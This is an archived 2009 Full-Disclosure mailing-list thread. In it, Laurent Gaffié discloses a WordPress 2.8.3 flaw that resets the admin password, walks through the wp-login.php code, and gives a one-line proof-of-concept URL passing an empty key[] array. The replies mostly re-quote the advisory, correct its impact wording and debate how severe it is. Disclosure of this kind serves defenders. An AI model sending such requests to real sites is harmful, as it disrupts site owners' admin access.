Mailing List Archive

WordPress <= 2.8.3 Remote admin reset password
=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability.
WordPress is both free and priceless at the same time.
More simply, WordPress is what you use when you want to work with your
blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way Wordpress handle a password reset looks like this:
You submit your email adress or username via this form
/wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then Wordpress reset your admin password, and
sends you over another email with your new credentials.

Let's see how it works:


wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
global $wpdb;

$key = preg_replace('/[^a-z0-9]/i', '', $key);

if ( empty( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));

$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
$action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
'resetpass', 'rp', 'register', 'login')) && false ===
has_filter('login_form_' . $action) )
$action = 'login';
...[snip]....

line 370:

break;

case 'resetpass' :
case 'rp' :
$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}

wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();

break;
...[snip ]...

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key variable.


IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch aviable for the moment.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great research
on PHP, as for this under-estimated vulnerability discovered by Maksymilian
Arciemowicz :
http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Errata:

"V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3"

-->

"V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to reset the admin account of
any wordpress/wordpress-mu <= 2.8.3"


Regards Laurent Gaffié


2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>

> =============================================
> - Release date: August 10th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: Medium
> =============================================
>
> I. VULNERABILITY
> -------------------------
> WordPress <= 2.8.3 Remote admin reset password
>
> II. BACKGROUND
> -------------------------
> WordPress is a state-of-the-art publishing platform with a focus on
> aesthetics, web standards, and usability.
> WordPress is both free and priceless at the same time.
> More simply, WordPress is what you use when you want to work with your
> blogging software, not fight it.
>
> III. DESCRIPTION
> -------------------------
> The way Wordpress handle a password reset looks like this:
> You submit your email adress or username via this form
> /wp-login.php?action=lostpassword ;
> Wordpress send you a reset confirmation like that via email:
>
> "
> Someone has asked to reset the password for the following site and
> username.
> http://DOMAIN_NAME.TLD/wordpress
> Username: admin
> To reset your password visit the following address, otherwise just ignore
> this email and nothing will happen
>
>
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> "
>
> You click on the link, and then Wordpress reset your admin password, and
> sends you over another email with your new credentials.
>
> Let's see how it works:
>
>
> wp-login.php:
> ...[snip]....
> line 186:
> function reset_password($key) {
> global $wpdb;
>
> $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
> if ( empty( $key ) )
> return new WP_Error('invalid_key', __('Invalid key'));
>
> $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
> user_activation_key = %s", $key));
> if ( empty( $user ) )
> return new WP_Error('invalid_key', __('Invalid key'));
> ...[snip]....
> line 276:
> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> $errors = new WP_Error();
>
> if ( isset($_GET['key']) )
> $action = 'resetpass';
>
> // validate action so as to default to the login screen
> if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
> 'resetpass', 'rp', 'register', 'login')) && false ===
> has_filter('login_form_' . $action) )
> $action = 'login';
> ...[snip]....
>
> line 370:
>
> break;
>
> case 'resetpass' :
> case 'rp' :
> $errors = reset_password($_GET['key']);
>
> if ( ! is_wp_error($errors) ) {
> wp_redirect('wp-login.php?checkemail=newpass');
> exit();
> }
>
> wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> exit();
>
> break;
> ...[snip ]...
>
> You can abuse the password reset function, and bypass the first step and
> then reset the admin password by submiting an array to the $key variable.
>
>
> IV. PROOF OF CONCEPT
> -------------------------
> A web browser is sufficiant to reproduce this Proof of concept:
> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> The password will be reset without any confirmation.
>
> V. BUSINESS IMPACT
> -------------------------
> An attacker could exploit this vulnerability to compromise the admin
> account of any wordpress/wordpress-mu <= 2.8.3
>
> VI. SYSTEMS AFFECTED
> -------------------------
> All
>
> VII. SOLUTION
> -------------------------
> No patch aviable for the moment.
>
> VIII. REFERENCES
> -------------------------
> http://www.wordpress.org
>
> IX. CREDITS
> -------------------------
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
> I'd like to shoot some greetz to securityreason.com for them great
> research on PHP, as for this under-estimated vulnerability discovered by
> Maksymilian Arciemowicz :
> http://securityreason.com/achievement_securityalert/38
>
> X. REVISION HISTORY
> -------------------------
> August 10th, 2009: Initial release
>
> XI. LEGAL NOTICES
> -------------------------
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
>
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Hi there,

This wasn't tested on the 2.7* branch.
It as been tested on the 2.8.* branch, with php 5.3.0 & php 5.2.9 as an
Apache 2.2.12 module, on a linux env.


Regards Laurent Gaffié



2009/8/10 Nicolas Valcárcel Scerpella <nicolas.valcarcel@canonical.com>

> I don't see the issue with wp 2.7.1
>
> On Mon, 10 Aug 2009, laurent gaffie wrote:
>
> > Errata:
> >
> > "V. BUSINESS IMPACT
> > -------------------------
> > An attacker could exploit this vulnerability to compromise the admin
> account
> > of any wordpress/wordpress-mu <= 2.8.3"
> >
> > -->
> >
> > "V. BUSINESS IMPACT
> > -------------------------
> > An attacker could exploit this vulnerability to reset the admin account
> of
> > any wordpress/wordpress-mu <= 2.8.3"
> >
> >
> > Regards Laurent Gaffié
> >
> >
> > 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
> >
> > > =============================================
> > > - Release date: August 10th, 2009
> > > - Discovered by: Laurent Gaffié
> > > - Severity: Medium
> > > =============================================
> > >
> > > I. VULNERABILITY
> > > -------------------------
> > > WordPress <= 2.8.3 Remote admin reset password
> > >
> > > II. BACKGROUND
> > > -------------------------
> > > WordPress is a state-of-the-art publishing platform with a focus on
> > > aesthetics, web standards, and usability.
> > > WordPress is both free and priceless at the same time.
> > > More simply, WordPress is what you use when you want to work with your
> > > blogging software, not fight it.
> > >
> > > III. DESCRIPTION
> > > -------------------------
> > > The way Wordpress handle a password reset looks like this:
> > > You submit your email adress or username via this form
> > > /wp-login.php?action=lostpassword ;
> > > Wordpress send you a reset confirmation like that via email:
> > >
> > > "
> > > Someone has asked to reset the password for the following site and
> > > username.
> > > http://DOMAIN_NAME.TLD/wordpress
> > > Username: admin
> > > To reset your password visit the following address, otherwise just
> ignore
> > > this email and nothing will happen
> > >
> > >
> > >
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> > > "
> > >
> > > You click on the link, and then Wordpress reset your admin password,
> and
> > > sends you over another email with your new credentials.
> > >
> > > Let's see how it works:
> > >
> > >
> > > wp-login.php:
> > > ...[snip]....
> > > line 186:
> > > function reset_password($key) {
> > > global $wpdb;
> > >
> > > $key = preg_replace('/[^a-z0-9]/i', '', $key);
> > >
> > > if ( empty( $key ) )
> > > return new WP_Error('invalid_key', __('Invalid key'));
> > >
> > > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
> WHERE
> > > user_activation_key = %s", $key));
> > > if ( empty( $user ) )
> > > return new WP_Error('invalid_key', __('Invalid key'));
> > > ...[snip]....
> > > line 276:
> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> > > $errors = new WP_Error();
> > >
> > > if ( isset($_GET['key']) )
> > > $action = 'resetpass';
> > >
> > > // validate action so as to default to the login screen
> > > if ( !in_array($action, array('logout', 'lostpassword',
> 'retrievepassword',
> > > 'resetpass', 'rp', 'register', 'login')) && false ===
> > > has_filter('login_form_' . $action) )
> > > $action = 'login';
> > > ...[snip]....
> > >
> > > line 370:
> > >
> > > break;
> > >
> > > case 'resetpass' :
> > > case 'rp' :
> > > $errors = reset_password($_GET['key']);
> > >
> > > if ( ! is_wp_error($errors) ) {
> > > wp_redirect('wp-login.php?checkemail=newpass');
> > > exit();
> > > }
> > >
> > > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> > > exit();
> > >
> > > break;
> > > ...[snip ]...
> > >
> > > You can abuse the password reset function, and bypass the first step
> and
> > > then reset the admin password by submiting an array to the $key
> variable.
> > >
> > >
> > > IV. PROOF OF CONCEPT
> > > -------------------------
> > > A web browser is sufficiant to reproduce this Proof of concept:
> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> <http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> > > The password will be reset without any confirmation.
> > >
> > > V. BUSINESS IMPACT
> > > -------------------------
> > > An attacker could exploit this vulnerability to compromise the admin
> > > account of any wordpress/wordpress-mu <= 2.8.3
> > >
> > > VI. SYSTEMS AFFECTED
> > > -------------------------
> > > All
> > >
> > > VII. SOLUTION
> > > -------------------------
> > > No patch aviable for the moment.
> > >
> > > VIII. REFERENCES
> > > -------------------------
> > > http://www.wordpress.org
> > >
> > > IX. CREDITS
> > > -------------------------
> > > This vulnerability has been discovered by Laurent Gaffié
> > > Laurent.gaffie{remove-this}(at)gmail.com
> > > I'd like to shoot some greetz to securityreason.com for them great
> > > research on PHP, as for this under-estimated vulnerability discovered
> by
> > > Maksymilian Arciemowicz :
> > > http://securityreason.com/achievement_securityalert/38
> > >
> > > X. REVISION HISTORY
> > > -------------------------
> > > August 10th, 2009: Initial release
> > >
> > > XI. LEGAL NOTICES
> > > -------------------------
> > > The information contained within this advisory is supplied "as-is"
> > > with no warranties or guarantees of fitness of use or otherwise.
> > > I accept no responsibility for any damage caused by the use or
> > > misuse of this information.
> > >
>
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Nicolas Valcárcel
> Security Engineer
> Custom Engineering Solutions Group
> Canonical OEM Services
> Mobile: +511 994 293 200
> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9 DD12 524E C3CD EF58 4970
> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
>
> iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF
> 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK
> VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk
> OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+
> 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w
> Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY=
> =UdOl
> -----END PGP SIGNATURE-----
>
>
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
Oh ok.
Then, let's avoid that function.
If it's useless to have a function who validate a reset passwd before
resetting it, let's just avoid it smartass.


2009/8/10 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>

There is no risk on this.
> It's just a little flaw, it doesn't broke anything or put your admin access
> in risk.
>
> :-P to me , this vulnerability is more "BUZZ" then real deal. LOL
>
>
> 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>
>> Hi there,
>>
>> This wasn't tested on the 2.7* branch.
>> It as been tested on the 2.8.* branch, with php 5.3.0 & php 5.2.9 as an
>> Apache 2.2.12 module, on a linux env.
>>
>>
>> Regards Laurent Gaffié
>>
>>
>>
>> 2009/8/10 Nicolas Valcárcel Scerpella <nicolas.valcarcel@canonical.com>
>>
>>> I don't see the issue with wp 2.7.1
>>>
>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>>>
>>> > Errata:
>>> >
>>> > "V. BUSINESS IMPACT
>>> > -------------------------
>>> > An attacker could exploit this vulnerability to compromise the admin
>>> account
>>> > of any wordpress/wordpress-mu <= 2.8.3"
>>> >
>>> > -->
>>> >
>>> > "V. BUSINESS IMPACT
>>> > -------------------------
>>> > An attacker could exploit this vulnerability to reset the admin account
>>> of
>>> > any wordpress/wordpress-mu <= 2.8.3"
>>> >
>>> >
>>> > Regards Laurent Gaffié
>>> >
>>> >
>>> > 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>>> >
>>> > > =============================================
>>> > > - Release date: August 10th, 2009
>>> > > - Discovered by: Laurent Gaffié
>>> > > - Severity: Medium
>>> > > =============================================
>>> > >
>>> > > I. VULNERABILITY
>>> > > -------------------------
>>> > > WordPress <= 2.8.3 Remote admin reset password
>>> > >
>>> > > II. BACKGROUND
>>> > > -------------------------
>>> > > WordPress is a state-of-the-art publishing platform with a focus on
>>> > > aesthetics, web standards, and usability.
>>> > > WordPress is both free and priceless at the same time.
>>> > > More simply, WordPress is what you use when you want to work with
>>> your
>>> > > blogging software, not fight it.
>>> > >
>>> > > III. DESCRIPTION
>>> > > -------------------------
>>> > > The way Wordpress handle a password reset looks like this:
>>> > > You submit your email adress or username via this form
>>> > > /wp-login.php?action=lostpassword ;
>>> > > Wordpress send you a reset confirmation like that via email:
>>> > >
>>> > > "
>>> > > Someone has asked to reset the password for the following site and
>>> > > username.
>>> > > http://DOMAIN_NAME.TLD/wordpress
>>> > > Username: admin
>>> > > To reset your password visit the following address, otherwise just
>>> ignore
>>> > > this email and nothing will happen
>>> > >
>>> > >
>>> > >
>>> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>>> > > "
>>> > >
>>> > > You click on the link, and then Wordpress reset your admin password,
>>> and
>>> > > sends you over another email with your new credentials.
>>> > >
>>> > > Let's see how it works:
>>> > >
>>> > >
>>> > > wp-login.php:
>>> > > ...[snip]....
>>> > > line 186:
>>> > > function reset_password($key) {
>>> > > global $wpdb;
>>> > >
>>> > > $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>> > >
>>> > > if ( empty( $key ) )
>>> > > return new WP_Error('invalid_key', __('Invalid key'));
>>> > >
>>> > > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
>>> WHERE
>>> > > user_activation_key = %s", $key));
>>> > > if ( empty( $user ) )
>>> > > return new WP_Error('invalid_key', __('Invalid key'));
>>> > > ...[snip]....
>>> > > line 276:
>>> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
>>> > > $errors = new WP_Error();
>>> > >
>>> > > if ( isset($_GET['key']) )
>>> > > $action = 'resetpass';
>>> > >
>>> > > // validate action so as to default to the login screen
>>> > > if ( !in_array($action, array('logout', 'lostpassword',
>>> 'retrievepassword',
>>> > > 'resetpass', 'rp', 'register', 'login')) && false ===
>>> > > has_filter('login_form_' . $action) )
>>> > > $action = 'login';
>>> > > ...[snip]....
>>> > >
>>> > > line 370:
>>> > >
>>> > > break;
>>> > >
>>> > > case 'resetpass' :
>>> > > case 'rp' :
>>> > > $errors = reset_password($_GET['key']);
>>> > >
>>> > > if ( ! is_wp_error($errors) ) {
>>> > > wp_redirect('wp-login.php?checkemail=newpass');
>>> > > exit();
>>> > > }
>>> > >
>>> > > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>>> > > exit();
>>> > >
>>> > > break;
>>> > > ...[snip ]...
>>> > >
>>> > > You can abuse the password reset function, and bypass the first step
>>> and
>>> > > then reset the admin password by submiting an array to the $key
>>> variable.
>>> > >
>>> > >
>>> > > IV. PROOF OF CONCEPT
>>> > > -------------------------
>>> > > A web browser is sufficiant to reproduce this Proof of concept:
>>> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>>> <http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>>> > > The password will be reset without any confirmation.
>>> > >
>>> > > V. BUSINESS IMPACT
>>> > > -------------------------
>>> > > An attacker could exploit this vulnerability to compromise the admin
>>> > > account of any wordpress/wordpress-mu <= 2.8.3
>>> > >
>>> > > VI. SYSTEMS AFFECTED
>>> > > -------------------------
>>> > > All
>>> > >
>>> > > VII. SOLUTION
>>> > > -------------------------
>>> > > No patch aviable for the moment.
>>> > >
>>> > > VIII. REFERENCES
>>> > > -------------------------
>>> > > http://www.wordpress.org
>>> > >
>>> > > IX. CREDITS
>>> > > -------------------------
>>> > > This vulnerability has been discovered by Laurent Gaffié
>>> > > Laurent.gaffie{remove-this}(at)gmail.com
>>> > > I'd like to shoot some greetz to securityreason.com for them great
>>> > > research on PHP, as for this under-estimated vulnerability discovered
>>> by
>>> > > Maksymilian Arciemowicz :
>>> > > http://securityreason.com/achievement_securityalert/38
>>> > >
>>> > > X. REVISION HISTORY
>>> > > -------------------------
>>> > > August 10th, 2009: Initial release
>>> > >
>>> > > XI. LEGAL NOTICES
>>> > > -------------------------
>>> > > The information contained within this advisory is supplied "as-is"
>>> > > with no warranties or guarantees of fitness of use or otherwise.
>>> > > I accept no responsibility for any damage caused by the use or
>>> > > misuse of this information.
>>> > >
>>>
>>> > _______________________________________________
>>> > Full-Disclosure - We believe in it.
>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>> --
>>> Nicolas Valcárcel
>>> Security Engineer
>>> Custom Engineering Solutions Group
>>> Canonical OEM Services
>>> Mobile: +511 994 293 200
>>> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9 DD12 524E C3CD EF58 4970
>>> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>>>
>>> -----BEGIN PGP SIGNATURE-----
>>> Version: GnuPG v1.4.9 (GNU/Linux)
>>>
>>> iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF
>>> 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK
>>> VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk
>>> OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+
>>> 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w
>>> Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY=
>>> =UdOl
>>> -----END PGP SIGNATURE-----
>>>
>>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
>
> If you have questions please let me know.
> Best regards,
> - Fábio - IT Manager
>
Re: WordPress <= 2.8.3 Remote admin reset password [ In reply to ]
I'm guessing your not a Wordpress administrator, Fabio. Nice find
Laurent, as usual.

On Mon, Aug 10, 2009 at 10:48 PM, laurent
gaffie<laurent.gaffie@gmail.com> wrote:
> Oh ok.
> Then, let's avoid that function.
> If it's useless to have a function who validate a reset passwd before
> resetting it, let's just avoid it smartass.
>
>
> 2009/8/10 Fabio N Sarmento [ Gmail ] <fabior2@gmail.com>
>>
>> There is no risk on this.
>> It's just a little flaw, it doesn't broke anything or put your admin
>> access in risk.
>>
>> :-P to me , this vulnerability is more "BUZZ" then real deal. LOL
>>
>> 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>>>
>>> Hi there,
>>>
>>> This wasn't tested on the 2.7* branch.
>>> It as been tested on the  2.8.* branch, with php 5.3.0 & php 5.2.9 as an
>>> Apache 2.2.12 module, on a linux env.
>>>
>>>
>>> Regards Laurent Gaffié
>>>
>>>
>>>
>>> 2009/8/10 Nicolas Valcárcel Scerpella <nicolas.valcarcel@canonical.com>
>>>>
>>>> I don't see the issue with wp 2.7.1
>>>>
>>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>>>>
>>>> > Errata:
>>>> >
>>>> > "V. BUSINESS IMPACT
>>>> > -------------------------
>>>> > An attacker could exploit this vulnerability to compromise the admin
>>>> > account
>>>> > of any wordpress/wordpress-mu <= 2.8.3"
>>>> >
>>>> > -->
>>>> >
>>>> > "V. BUSINESS IMPACT
>>>> > -------------------------
>>>> > An attacker could exploit this vulnerability to reset the admin
>>>> > account of
>>>> > any wordpress/wordpress-mu <= 2.8.3"
>>>> >
>>>> >
>>>> > Regards Laurent Gaffié
>>>> >
>>>> >
>>>> > 2009/8/10 laurent gaffie <laurent.gaffie@gmail.com>
>>>> >
>>>> > > =============================================
>>>> > > - Release date: August 10th, 2009
>>>> > > - Discovered by: Laurent Gaffié
>>>> > > - Severity: Medium
>>>> > > =============================================
>>>> > >
>>>> > > I. VULNERABILITY
>>>> > > -------------------------
>>>> > > WordPress <= 2.8.3 Remote admin reset password
>>>> > >
>>>> > > II. BACKGROUND
>>>> > > -------------------------
>>>> > > WordPress is a state-of-the-art publishing platform with a focus on
>>>> > > aesthetics, web standards, and usability.
>>>> > > WordPress is both free and priceless at the same time.
>>>> > > More simply, WordPress is what you use when you want to work with
>>>> > > your
>>>> > > blogging software, not fight it.
>>>> > >
>>>> > > III. DESCRIPTION
>>>> > > -------------------------
>>>> > > The way Wordpress handle a password reset looks like this:
>>>> > > You submit your email adress or username via this form
>>>> > > /wp-login.php?action=lostpassword ;
>>>> > > Wordpress send you a reset confirmation like that via email:
>>>> > >
>>>> > > "
>>>> > > Someone has asked to reset the password for the following site and
>>>> > > username.
>>>> > > http://DOMAIN_NAME.TLD/wordpress
>>>> > > Username: admin
>>>> > > To reset your password visit the following address, otherwise just
>>>> > > ignore
>>>> > > this email and nothing will happen
>>>> > >
>>>> > >
>>>> > >
>>>> > > http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>>>> > > "
>>>> > >
>>>> > > You click on the link, and then Wordpress reset your admin password,
>>>> > > and
>>>> > > sends you over another email with your new credentials.
>>>> > >
>>>> > > Let's see how it works:
>>>> > >
>>>> > >
>>>> > > wp-login.php:
>>>> > > ...[snip]....
>>>> > > line 186:
>>>> > > function reset_password($key) {
>>>> > >     global $wpdb;
>>>> > >
>>>> > >     $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>>> > >
>>>> > >     if ( empty( $key ) )
>>>> > >         return new WP_Error('invalid_key', __('Invalid key'));
>>>> > >
>>>> > >     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM
>>>> > > $wpdb->users WHERE
>>>> > > user_activation_key = %s", $key));
>>>> > >     if ( empty( $user ) )
>>>> > >         return new WP_Error('invalid_key', __('Invalid key'));
>>>> > > ...[snip]....
>>>> > > line 276:
>>>> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] :
>>>> > > 'login';
>>>> > > $errors = new WP_Error();
>>>> > >
>>>> > > if ( isset($_GET['key']) )
>>>> > >     $action = 'resetpass';
>>>> > >
>>>> > > // validate action so as to default to the login screen
>>>> > > if ( !in_array($action, array('logout', 'lostpassword',
>>>> > > 'retrievepassword',
>>>> > > 'resetpass', 'rp', 'register', 'login')) && false ===
>>>> > > has_filter('login_form_' . $action) )
>>>> > >     $action = 'login';
>>>> > > ...[snip]....
>>>> > >
>>>> > > line 370:
>>>> > >
>>>> > > break;
>>>> > >
>>>> > > case 'resetpass' :
>>>> > > case 'rp' :
>>>> > >     $errors = reset_password($_GET['key']);
>>>> > >
>>>> > >     if ( ! is_wp_error($errors) ) {
>>>> > >         wp_redirect('wp-login.php?checkemail=newpass');
>>>> > >         exit();
>>>> > >     }
>>>> > >
>>>> > >
>>>> > > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>>>> > >     exit();
>>>> > >
>>>> > > break;
>>>> > > ...[snip ]...
>>>> > >
>>>> > > You can abuse the password reset function, and bypass the first step
>>>> > > and
>>>> > > then reset the admin password by submiting an array to the $key
>>>> > > variable.
>>>> > >
>>>> > >
>>>> > > IV. PROOF OF CONCEPT
>>>> > > -------------------------
>>>> > > A web browser is sufficiant to reproduce this Proof of concept:
>>>> > >
>>>> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>>>> > > The password will be reset without any confirmation.
>>>> > >
>>>> > > V. BUSINESS IMPACT
>>>> > > -------------------------
>>>> > > An attacker could exploit this vulnerability to compromise the admin
>>>> > > account of any wordpress/wordpress-mu <= 2.8.3
>>>> > >
>>>> > > VI. SYSTEMS AFFECTED
>>>> > > -------------------------
>>>> > > All
>>>> > >
>>>> > > VII. SOLUTION
>>>> > > -------------------------
>>>> > > No patch aviable for the moment.
>>>> > >
>>>> > > VIII. REFERENCES
>>>> > > -------------------------
>>>> > > http://www.wordpress.org
>>>> > >
>>>> > > IX. CREDITS
>>>> > > -------------------------
>>>> > > This vulnerability has been discovered by Laurent Gaffié
>>>> > > Laurent.gaffie{remove-this}(at)gmail.com
>>>> > > I'd like to shoot some greetz to securityreason.com for them great
>>>> > > research on PHP, as for this under-estimated vulnerability
>>>> > > discovered by
>>>> > > Maksymilian Arciemowicz :
>>>> > > http://securityreason.com/achievement_securityalert/38
>>>> > >
>>>> > > X. REVISION HISTORY
>>>> > > -------------------------
>>>> > > August 10th, 2009: Initial release
>>>> > >
>>>> > > XI. LEGAL NOTICES
>>>> > > -------------------------
>>>> > > The information contained within this advisory is supplied "as-is"
>>>> > > with no warranties or guarantees of fitness of use or otherwise.
>>>> > > I accept no responsibility for any damage caused by the use or
>>>> > > misuse of this information.
>>>> > >
>>>>
>>>> > _______________________________________________
>>>> > Full-Disclosure - We believe in it.
>>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>> --
>>>> Nicolas Valcárcel
>>>> Security Engineer
>>>> Custom Engineering Solutions Group
>>>> Canonical OEM Services
>>>> Mobile: +511 994 293 200
>>>> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9  DD12 524E C3CD EF58 4970
>>>> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>>>>
>>>> -----BEGIN PGP SIGNATURE-----
>>>> Version: GnuPG v1.4.9 (GNU/Linux)
>>>>
>>>> iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF
>>>> 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK
>>>> VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk
>>>> OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+
>>>> 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w
>>>> Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY=
>>>> =UdOl
>>>> -----END PGP SIGNATURE-----
>>>>
>>>
>>>
